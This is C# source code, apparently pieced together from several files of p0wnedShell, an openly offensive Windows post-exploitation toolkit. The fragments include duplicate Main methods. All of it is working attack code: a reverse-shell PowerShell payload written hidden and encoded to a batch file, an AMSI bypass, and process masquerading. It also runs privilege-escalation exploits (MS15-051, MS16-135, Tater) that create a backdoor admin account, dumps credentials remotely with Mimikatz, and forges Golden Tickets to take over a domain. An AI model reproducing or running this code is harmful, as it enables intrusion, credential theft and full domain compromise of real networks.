public static void Main()
{
string Arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int userInput = 0;
Pshell.InvokeShell();
}
public static void Trigger2()
{
string[] toPrint = { "* WebClient Service + Scheduled Task Trigger (Works on Windows 10). *",
"* *" };
// Program.PrintBanner(toPrint);
Console.ForegroundColor = ConsoleColor.Green;
Console.Write("[+] Please wait while running our exploit\n\n");
Console.ResetColor();
string Trigger_2 = "Invoke-Tater -Command " + TaterCommand() + "-Trigger 2 -ShowHelp N";
try
{
P0wnedListener.Execute(Trigger_2);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
string Admin = "net localgroup administrators";
string AdminPower = null;
try
{
AdminPower = Pshell.RunPSCommand(Admin);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
if (AdminPower.IndexOf("BadAss", 0, StringComparison.OrdinalIgnoreCase) != -1)
{
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("\n[!] You should now be able to login as user \"BadAss\" with passwd \"FacePalm01\"");
Console.WriteLine("[!] To make life easier, it should also PopUp a CommandShell with Local Administrator privileges :)\n");
Console.ResetColor();
Finished();
}
Console.WriteLine("\nPress Enter to Continue...");
Console.ReadLine();
return;
}
public static void PowerReversed()
{
PowerBanner();
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("Setup an reversed listener so remote clients can connect-back to you.\n");
Console.ResetColor();
int Lport = 0;
IPAddress Lhost = IPAddress.Parse("1.1.1.1");
IPAddress LocalIPAddress = null;
foreach (IPAddress address in Dns.GetHostEntry(Dns.GetHostName()).AddressList)
{
if (address.AddressFamily == AddressFamily.InterNetwork)
{
LocalIPAddress = address;
break;
}
}
if (LocalIPAddress != null)
{
Console.Write("\n[+] Our local IP address is: {0}, do you want to use this? (y/n) > ", LocalIPAddress);
Lhost = LocalIPAddress;
}
string input = Console.ReadLine();
switch (input.ToLower())
{
case "y":
break;
case "n":
while (true)
{
try
{
Console.Write("\nEnter ip address of your PowerCat Listener (e.g. 127.0.0.1): ");
Console.ForegroundColor = ConsoleColor.Green;
Lhost = IPAddress.Parse(Console.ReadLine());
Console.ResetColor();
Console.WriteLine();
break;
}
catch
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] That's not a valid IP address, Please Try again");
Console.ResetColor();
}
}
break;
default:
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] Wrong choice, please try again!\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
while (true)
{
try
{
Console.Write("Now Enter the listening port of your PowerCat Listener (e.g. 1337 or 4444): ");
Console.ForegroundColor = ConsoleColor.Green;
Lport = int.Parse(Console.ReadLine());
Console.ResetColor();
Console.WriteLine();
if (Lport < 1 || Lport > 65535)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[+] That's not a valid Port, Please Try again\n");
Console.ResetColor();
}
else
{
break;
}
}
catch
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] That's not a valid Port, Please Try again\n");
Console.ResetColor();
}
}
string Payload = "$client = New-Object System.Net.Sockets.TCPClient(\"" + Lhost + "\"," + Lport + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()";
Console.WriteLine("[+] Generating a PowerShell Payload which you can run on your remote clients, so they connect-back to you ;)\n");
Console.ForegroundColor = ConsoleColor.Green;
File.WriteAllText(Program.P0wnedPath() + "\\Invoke-PowerShellTcpOneLine.ps1", Payload);
Console.WriteLine("Payload saved as\t\t .\\Invoke-PowerShellTcpOneLine.ps1");
//System.Diagnostics.Process.Start("notepad.exe", Program.P0wnedPath()+"\\Invoke-PowerShellTcpOneLine.ps1");
Console.ResetColor();
string Encode = "Invoke-Encode -DataToEncode " + Program.P0wnedPath() + "\\Invoke-PowerShellTcpOneLine.ps1 -OutCommand -OutputFilePath " + Program.P0wnedPath() + "\\Encoded.txt -OutputCommandFilePath " + Program.P0wnedPath() + "\\EncodedPayload.bat";
Pshell.RunPSCommand(Encode);
string EncodedCmd = String.Empty;
if (File.Exists(Program.P0wnedPath() + "\\EncodedPayload.bat"))
{
File.Delete(Program.P0wnedPath() + "\\Encoded.txt");
EncodedCmd = File.ReadAllText(Program.P0wnedPath() + "\\EncodedPayload.bat");
File.WriteAllText(Program.P0wnedPath() + "\\EncodedPayload.bat", "powershell.exe -windowstyle hidden -e " + EncodedCmd);
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("Encoded Payload saved as\t .\\EncodedPayload.bat");
Console.ResetColor();
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[+] Oops something went wrong, please try again!\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
Console.WriteLine("\n[+] Please wait while setting up our Listener...\n");
string Reversed = "powercat -l -p " + Lport + " -t 1000 -Verbose";
try
{
P0wnedListener.Execute(Reversed);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
return;
}
public static void Entry()
{
string Arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
string LatestOSVersion = "6.3";
decimal latestOSVersionDec = decimal.Parse(LatestOSVersion, CultureInfo.InvariantCulture);
if (Pshell.EnvironmentHelper.RtlGetVersion() > latestOSVersionDec)
{
string MasqPath = p0wnedShellOpsec.masqBinary.Remove(p0wnedShellOpsec.masqBinary.LastIndexOf(@"\")).ToLower();
string SystemPath = Environment.SystemDirectory.ToLower();
AmsiBypass.Amsi(Arch);
if (p0wnedShellOpsec.AutoMasq && MasqPath == SystemPath)
{
// Starting Runspace before we Masquerade our Process
Pshell.P0wnedListener.Execute("Write-Host '[+] AMSI Bypassed'");
}
}
if (p0wnedShellOpsec.AutoMasq || ConsoleEx.IsInputRedirected || ConsoleEx.IsOutputRedirected)
{
Console.WriteLine("[+] Auto Masquerade our Process to: {0}", p0wnedShellOpsec.masqBinary);
if (!PEBMasq.MasqueradePEB(p0wnedShellOpsec.masqBinary))
{
Console.WriteLine("[!] Auto Masquerade Failed :(");
}
}
if (!p0wnedShellOpsec.AutoMasq)
{
Console.Title = "p0wnedShell - PowerShell Runspace Post Exploitation Toolkit";
}
if (!ConsoleEx.IsInputRedirected || !ConsoleEx.IsOutputRedirected || !ConsoleEx.IsErrorRedirected)
{
Console.SetWindowSize(Math.Min(120, Console.LargestWindowWidth), Math.Min(55, Console.LargestWindowHeight));
}
int userInput = 0;
do
{
userInput = DisplayMenu();
switch (userInput)
{
case 1:
Pshell.PowerView();
break;
case 2:
SitAwareness.Menu();
break;
case 3:
Pshell.PortScan();
break;
case 4:
Execution.Menu();
break;
case 5:
Pshell.PowerUp();
break;
case 6:
GetSystem.Menu();
break;
case 7:
Inveigh.Menu();
break;
case 8:
Pshell.GetGPPPassword();
break;
case 9:
Roast.Menu();
break;
case 10:
ADAttacks.Menu();
break;
case 11:
Exploits.Menu();
break;
case 12:
if (Arch == "x86")
{
Pshell.MS14_068();
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] Sorry this option only works for p0wnedShellx86\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
}
break;
case 13:
p0wnedMeter.Menu();
break;
case 14:
LatMovement.Menu();
break;
case 15:
PowerCat.Menu();
break;
case 16:
Pshell.InvokeShell();
break;
default:
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\nSee you later Alligator ;)");
Console.ResetColor();
break;
}
} while (userInput != 17);
string TempFolder = Path.GetTempPath();
if (File.Exists(TempFolder + "\\Amsi.dll"))
{
File.Delete(TempFolder + "\\Amsi.dll");
}
}
public static void PsExecShell(string Hostname)
{
string TestConnection = "Invoke-PsExec -ComputerName " + Hostname + " -Command \"whoami\" -ResultFile \"" + Program.P0wnedPath() + "\\Result.txt\"";
Pshell.RunPSCommand(TestConnection);
if (!File.Exists(Program.P0wnedPath() + "\\Result.txt"))
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] Cannot connect to server, probably insufficient permission or a firewall blocking our connection.\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
File.Delete(Program.P0wnedPath() + "\\Result.txt");
Console.WriteLine();
while (true)
{
int bufSize = 8192;
Stream inStream = Console.OpenStandardInput(bufSize);
Console.SetIn(new StreamReader(inStream, Console.InputEncoding, false, bufSize));
Console.Write("[system@" + Hostname + " ~]$ ");
string cmd = Console.ReadLine();
string PsExec = "Invoke-PsExec -ComputerName " + Hostname + " -Command \"" + cmd + "\" -ResultFile \"" + Program.P0wnedPath() + "\\Result.txt\"";
string Result = null;
if (cmd == "exit")
{
return;
}
else if (cmd == "quit")
{
return;
}
else
{
try
{
Pshell.RunPSCommand(PsExec);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
}
if (File.Exists(Program.P0wnedPath() + "\\Result.txt"))
{
Result = System.IO.File.ReadAllText(Program.P0wnedPath() + "\\Result.txt");
System.Console.WriteLine("{0}", Result);
File.Delete(Program.P0wnedPath() + "\\Result.txt");
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[+] Oops something went wrong, please try again!\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
}
}
public static void MS16_135()
{
string[] toPrint = { "* Exploiting win32k.sys NtSetWindowLongPtr (CVE-2016-7255) *",
"* MS16-135 exploit By @TinySecEx and @FuzzySec *" };
Program.PrintBanner(toPrint);
string osArch = "x86";
if (Pshell.EnvironmentHelper.Is64BitOperatingSystem())
{
osArch = "x64";
}
string procArch = "x86";
if (Pshell.EnvironmentHelper.Is64BitProcess())
{
procArch = "x64";
}
//detect if the correct architecture is being used
if (procArch != osArch)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[+] Your OS Architectecture does not match the version of p0wnedShell you run.");
Console.WriteLine("[+] To run this Exploit, you should run the " + osArch + " version of p0wnedShell\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
string MS16_135 = "Invoke-MS16-135";
try
{
P0wnedListener.Execute(MS16_135);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
string Whoami = "whoami";
string SystemPower = null;
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] let's check if our exploit succeeded:\n");
Console.ResetColor();
try
{
SystemPower = Pshell.RunPSCommand(Whoami);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
if (SystemPower.IndexOf("system", 0, StringComparison.OrdinalIgnoreCase) != -1)
{
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("[+] The Ring has awoken, it’s heard its masters call :)\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue and Get The Party Started...");
Console.ReadLine();
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[+] Exploit failed, System probably already patched!\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
}
return;
}
public static void MS15_051()
{
string[] toPrint = { "* Get into Ring0 using the MS15-051 Vulnerability. *" };
Program.PrintBanner(toPrint);
string osArch = "x86";
if (Pshell.EnvironmentHelper.Is64BitOperatingSystem())
{
osArch = "x64";
}
string procArch = "x86";
if (Pshell.EnvironmentHelper.Is64BitProcess())
{
procArch = "x64";
}
//detect if the correct architecture is being used
if (procArch != osArch)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[+] Your OS Architectecture does not match the version of p0wnedShell you run.");
Console.WriteLine("[+] To run this Exploit, you should run the " + osArch + " version of p0wnedShell\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
OperatingSystem OS = System.Environment.OSVersion;
string LatestOSVersion = "6.3";
decimal latestOSVersionDec = decimal.Parse(LatestOSVersion, CultureInfo.InvariantCulture);
if (Pshell.EnvironmentHelper.RtlGetVersion() > latestOSVersionDec)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[+] MS15-051 is only exploitable on Windows 8.1/2012 R2 or lower.\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("This Exploit can only succeed when patch KB3045171 is not installed on this system.\n");
Console.ResetColor();
Console.Write("[+] Please wait until loaded...\n");
Console.WriteLine();
string MS15_051 = "Invoke-ReflectivePEInjection -PEBytes (\"" + Binaries.MS15_051(osArch) + "\" -split ' ') -Verbose";
try
{
P0wnedListener.Execute(MS15_051);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
string Whoami = "whoami";
string SystemPower = null;
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] let's check if our exploit succeeded:\n");
Console.ResetColor();
try
{
SystemPower = Pshell.RunPSCommand(Whoami);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
if (SystemPower.IndexOf("system", 0, StringComparison.OrdinalIgnoreCase) != -1)
{
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("[+] The Ring has awoken, it’s heard its masters call :)\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue and Get The Party Started...");
Console.ReadLine();
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[+] Exploit failed, System probably already patched!\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
}
return;
}
public static void Trigger1()
{
string[] toPrint = { "* Trigger 1 -> NBNS WPAD Bruteforce + Defender Signature Updates *" };
// Program.PrintBanner(toPrint);
IPAddress SpoofIP = IPAddress.Parse("1.1.1.1");
int Lport = 80;
if (PortInUse(Lport))
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("[!] Port " + Lport + " is already in use, so you need to setup a remote WPAD Proxy.");
Console.WriteLine("[!] After running the remote WPAD Proxy, come back and enter the new Spoofed WPAD IP and HTTP Listener Port.\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
while (true)
{
try
{
Console.Write("Enter the IP address of the remote WPAD Proxy (e.g. 192.168.1.1): ");
Console.ForegroundColor = ConsoleColor.Green;
SpoofIP = IPAddress.Parse(Console.ReadLine());
Console.ResetColor();
Console.WriteLine();
break;
}
catch
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] That's not a valid IP address, Please Try again");
Console.ResetColor();
}
}
while (true)
{
try
{
Console.Write("Now enter the listening port of the Tater HTTP Listener (e.g. 81 or 8080): ");
Console.ForegroundColor = ConsoleColor.Green;
Lport = int.Parse(Console.ReadLine());
Console.ResetColor();
Console.WriteLine();
if (Lport < 1 || Lport > 65535)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[+] That's not a valid Port, Please Try again\n");
Console.ResetColor();
}
else
{
break;
}
}
catch
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] That's not a valid Port, Please Try again\n");
Console.ResetColor();
}
}
}
string WpadHost = "WPAD";
Console.Write("Default WPAD entry to spoof is: {0}, do you want to use this? (y/n) > ", WpadHost);
string input = Console.ReadLine();
switch (input.ToLower())
{
case "y":
break;
case "n":
Console.Write("\nEnter WPAD host entry to spoof (e.g. WPAD.YOURDOMAIN.LOCAL): ");
Console.ForegroundColor = ConsoleColor.Green;
WpadHost = Console.ReadLine();
Console.ResetColor();
break;
default:
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n [!] Wrong choice, please try again!");
Console.ResetColor();
return;
}
string Exhaust = "N";
Console.Write("\nEnable UDP port exhaustion to force all DNS lookups to fail (Be Cautious)? (y/n) > ");
input = Console.ReadLine();
switch (input.ToLower())
{
case "y":
Exhaust = "Y";
break;
case "n":
Exhaust = "N";
break;
default:
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n [!] Wrong choice, please try again!");
Console.ResetColor();
return;
}
string Trigger_1 = null;
if (PortInUse(80))
{
Trigger_1 = "Invoke-Tater -Command " + TaterCommand() + " -SpooferIP " + SpoofIP + " -HTTPPort " + Lport + " -ExhaustUDP " + Exhaust + " -Hostname " + WpadHost + " -ShowHelp N";
}
else
{
Trigger_1 = "Invoke-Tater -Command " + TaterCommand() + " -ExhaustUDP " + Exhaust + " -Hostname " + WpadHost + " -ShowHelp N";
}
Console.ForegroundColor = ConsoleColor.Green;
Console.Write("\n[+] Now please wait while running our exploit\n\n");
Console.ResetColor();
try
{
P0wnedListener.Execute(Trigger_1);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
string Admin = "net localgroup administrators";
string AdminPower = null;
try
{
AdminPower = Pshell.RunPSCommand(Admin);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
if (AdminPower.IndexOf("BadAss", 0, StringComparison.OrdinalIgnoreCase) != -1)
{
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("\n[!] You should now be able to login as user \"BadAss\" with passwd \"FacePalm01\"");
Console.WriteLine("[!] To make life easier, it should also PopUp a CommandShell with Local Administrator privileges :)\n");
Console.ResetColor();
Finished();
}
Console.WriteLine("\nPress Enter to Continue...");
Console.ReadLine();
return;
}
public static void PassTheTicket()
{
string[] toPrint = { "* Use Mimikatz to inject a (Golden/Silver) Kerberos Ticket. *" };
Program.PrintBanner(toPrint);
string ticket = @"";
string Pass_The_Ticket = null;
Console.Write("[+] Please enter the name of the ticket file > ");
Console.ForegroundColor = ConsoleColor.Green;
ticket = Console.ReadLine().TrimEnd('\r', '\n');
Console.ResetColor();
if (ticket == "")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] This is not a valid ticket name, please try again\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
Console.Write("\n[+] Do you want to purge existing Kerberos tickets? (y/n) > ");
string input = Console.ReadLine();
switch (input.ToLower())
{
case "y":
Pass_The_Ticket = "Invoke-Mimikatz -Command '\"kerberos::purge\" \"kerberos::ptt " + ticket + "\"'";
break;
case "n":
Pass_The_Ticket = "Invoke-Mimikatz -Command '\"kerberos::ptt " + ticket + "\"'";
break;
default:
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] Wrong choice, please try again!\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
if (File.Exists(ticket))
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("\n[+] Now lets inject our Kerberos ticket in the current session.\n");
Console.ResetColor();
try
{
Console.WriteLine(Pshell.RunPSCommand(Pass_The_Ticket));
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] Ticket not found, please try again!\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
public static void Remote_Mimikatz()
{
string[] toPrint = { "* Execute Mimikatz on a remote computer to dump credentials. *" };
Program.PrintBanner(toPrint);
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("[+] For this attack to succeed, you need to have remote Admin privileges.\n");
Console.ResetColor();
Console.Write("[+] Do you have the required permissions (e.g. Domain Admin)? (y/n) > ");
string Hostname = null;
string Creds = null;
string input = Console.ReadLine();
switch (input.ToLower())
{
case "y":
Console.Write("\n[+] Please enter the fqdn hostname of the machine you want to dump the credentials (e.g. dc1.gotham.local) > ");
Console.ForegroundColor = ConsoleColor.Green;
Hostname = Console.ReadLine().TrimEnd('\r', '\n');
Console.ResetColor();
if (Hostname == "")
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] This is not a valid hostname, please try again\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
break;
case "n":
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] First try to elevate your permissions.\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
default:
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] Wrong choice, please try again!\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
string Remote_Mimikatz = "Invoke-Mimikatz -DumpCreds -ComputerName \"" + Hostname + "\"";
try
{
Creds = Pshell.RunPSCommand(Remote_Mimikatz);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
if (Creds.Length <= 5)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] Oops something went wrong, maybe a wrong Hostname?\n");
Console.ResetColor();
}
else
{
Console.WriteLine(Pshell.RunPSCommand(Remote_Mimikatz));
}
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
public static void GoldenTicket()
{
string[] toPrint = { "* Use Mimikatz to generate a Golden Ticket for the Domain *" };
Program.PrintBanner(toPrint);
string DomainJoined = String.Empty;
try
{
DomainJoined = Domain.GetComputerDomain().Name;
}
catch
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[+] Looks like our machine is not joined to a Windows Domain.\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine("[+] For this attack to succeed, we need to have the ntlm hash of the krbtgt account.");
Console.WriteLine("[+] We can get this hash using Mimikatz DCSync.\n");
Console.ResetColor();
Console.Write("[+] Do you have the ntlm hash of the krbtgt account? (y/n) > ");
string krbtgt_hash = null;
string input = Console.ReadLine();
switch (input.ToLower())
{
case "y":
Console.Write("\n[+] Please enter the hash of our sweet krbtgt account > ");
Console.ForegroundColor = ConsoleColor.Green;
krbtgt_hash = Console.ReadLine();
Console.ResetColor();
if (krbtgt_hash.Length != 32)
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] This is not a valid ntlm hash, please try again\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
break;
case "n":
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] First try to get this hash using Mimikatz DCSync or a NTDS.dit dump.\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
default:
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] Wrong choice, please try again!\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
Domain domain = Domain.GetCurrentDomain();
DomainController Current_DC = domain.PdcRoleOwner;
string DomainName = domain.ToString();
Console.WriteLine("[+] First return the name of our current domain.\n");
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine(DomainName);
Console.ResetColor();
Console.WriteLine("\n[+] Now return the SID for our domain.\n");
string DomainSID = Pshell.RunPSCommand("Get-DomainSID").ToString().TrimEnd('\r', '\n');
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine(DomainSID);
Console.ResetColor();
Console.Write("\n[+] Finally enter the name of the Super Human you want to be: ");
Console.ForegroundColor = ConsoleColor.Green;
string Super_Hero = Console.ReadLine();
Console.ResetColor();
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] Now wait while generating a forged Ticket-Granting Ticket (TGT)...\n");
Console.ResetColor();
string Golden_Ticket = "Invoke-Mimikatz -Command '\"kerberos::purge\" \"kerberos::golden /domain:" + DomainName + " /user:"******" /sid:" + DomainSID + " /krbtgt:" + krbtgt_hash + " /ticket:" + Program.P0wnedPath() + "\\" + Super_Hero + ".ticket\"'";
try
{
Console.WriteLine(Pshell.RunPSCommand(Golden_Ticket));
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
if (File.Exists(Program.P0wnedPath() + "\\" + Super_Hero + ".ticket"))
{
string Pass_The_Ticket = "Invoke-Mimikatz -Command '\"kerberos::ptt " + Program.P0wnedPath() + "\\" + Super_Hero + ".ticket\"'";
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[+] Now lets inject our Kerberos ticket in the current session\n");
Console.ResetColor();
try
{
Console.WriteLine(Pshell.RunPSCommand(Pass_The_Ticket));
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[+] Oops something went wrong, please try again!\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
string DC_Listing = "Get-ChildItem \\\\" + Current_DC + "\\C$";
string SuperPower = null;
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] And finally check if we really have SuperPower:\n");
Console.ResetColor();
try
{
SuperPower = Pshell.RunPSCommand(DC_Listing);
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
if (SuperPower.Length <= 5)
{
string Purge_Ticket = "Invoke-Mimikatz -Command '\"kerberos::purge\"'";
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("[+] Oops something went wrong, probably a wrong krbtgt Hash? Please try again!\n");
Console.WriteLine("[+] Let's purge our invalid Ticket!\n");
Console.ResetColor();
File.Delete(Program.P0wnedPath() + "\\" + Super_Hero + ".ticket");
try
{
Console.WriteLine(Pshell.RunPSCommand(Purge_Ticket));
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
}
else
{
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("\n[+] OwYeah, " + Super_Hero + " you are in Full Control of the Domain :)\n");
Console.ResetColor();
Console.WriteLine(Pshell.RunPSCommand(DC_Listing));
}
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
return;
}
public static void Main()
{
Console.Title = "p0wnedShell - PowerShell Runspace Post Exploitation Toolkit";
Console.SetWindowSize(Math.Min(120, Console.LargestWindowWidth), Math.Min(55, Console.LargestWindowHeight));
string Arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
string LatestOSVersion = "6.3";
decimal latestOSVersionDec = decimal.Parse(LatestOSVersion, CultureInfo.InvariantCulture);
if (Pshell.EnvironmentHelper.RtlGetVersion() > latestOSVersionDec)
{
AmsiBypass.Amsi(Arch);
}
int userInput = 0;
do
{
userInput = DisplayMenu();
switch (userInput)
{
case 1:
Pshell.PowerView();
break;
case 2:
SitAwareness.Menu();
break;
case 3:
Pshell.PortScan();
break;
case 4:
Execution.Menu();
break;
case 5:
Pshell.PowerUp();
break;
case 6:
GetSystem.Menu();
break;
case 7:
Inveigh.Menu();
break;
case 8:
Pshell.GetGPPPassword();
break;
case 9:
Roast.Menu();
break;
case 10:
ADAttacks.Menu();
break;
case 11:
Exploits.Menu();
break;
case 12:
if (Arch == "x86")
{
Pshell.MS14_068();
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\n[+] Sorry this option only works for p0wnedShellx86\n");
Console.ResetColor();
Console.WriteLine("Press Enter to Continue...");
Console.ReadLine();
}
break;
case 13:
p0wnedMeter.Menu();
break;
case 14:
LatMovement.Menu();
break;
case 15:
PowerCat.Menu();
break;
case 16:
Pshell.InvokeShell();
break;
default:
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("\nSee you later Alligator ;)");
Console.ResetColor();
break;
}
} while (userInput != 17);
if (File.Exists(Program.P0wnedPath() + "\\Amsi.dll"))
{
File.Delete(Program.P0wnedPath() + "\\Amsi.dll");
}
}
